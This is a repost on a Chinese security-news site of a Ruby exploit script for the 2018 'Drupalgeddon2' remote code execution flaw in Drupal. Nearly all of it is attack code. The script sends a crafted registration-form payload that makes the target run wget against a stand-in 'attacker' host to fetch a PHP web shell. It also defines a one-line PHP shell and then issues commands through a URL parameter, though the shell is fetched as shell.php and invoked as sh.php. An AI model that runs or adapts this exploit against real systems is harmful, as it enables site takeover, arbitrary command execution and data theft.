Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execut

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execut

来源：vfocus.net 作者：HansTopo 发布时间：2018-04-16

# EDB-Note. Have the contents of "shell" on http://attacker/shell.php

require 'net/http'

# Hans Topo ruby port from Drupalggedon2 exploit.
# Based on Vitalii Rudnykh exploit

target = ARGV[0]
command = ARGV[1]

url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'

shell = "<?php system($_GET['cmd']); ?>"

payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'

uri = URI(url)

http = Net::HTTP.new(uri.host,uri.port)

if uri.scheme == 'https'
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end

req = Net::HTTP::Post.new(uri.path)
req.body = payload

response = http.request(req)

if response.code != "200"
    puts "[*] Response: " + response.code
    puts "[*] Target seems not to be exploitable"
    exit
end

puts "[*] Target seems to be exploitable."

exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告